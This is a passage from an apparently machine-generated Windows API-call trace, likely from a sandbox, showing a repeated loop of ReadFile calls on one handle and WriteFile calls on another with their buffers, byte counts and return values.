lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.950] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.951] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.951] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.952] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.952] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.953] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.953] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.954] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.954] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.955] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.955] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.956] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.956] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.957] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.957] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.957] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.958] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.958] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.959] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x9b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.959] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.960] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.960] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.961] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.961] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.962] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.962] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.963] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.963] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.964] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.964] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.964] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.965] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.965] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.966] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.966] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.967] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.967] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.968] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.968] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.969] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x366, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.969] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.970] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x332, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.971] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.971] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x372, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.972] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.972] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.973] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.973] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.974] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.974] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x389, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.975] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.975] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.976] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.976] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.977] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.977] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.978] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.978] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.979] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.979] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.980] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.980] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.980] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.981] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.981] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.982] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.982] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.983] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.983] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.984] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.984] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.985] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.985] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.002] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.003] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.003] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.004] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.004] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.005] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.005] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.006] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.006] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.007] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.007] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.008] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.008] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.008] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.009] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.009] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.010] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.010] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.011] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.011] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x231, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.012] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.012] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.013] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x15f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.013] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.014] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.014] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: 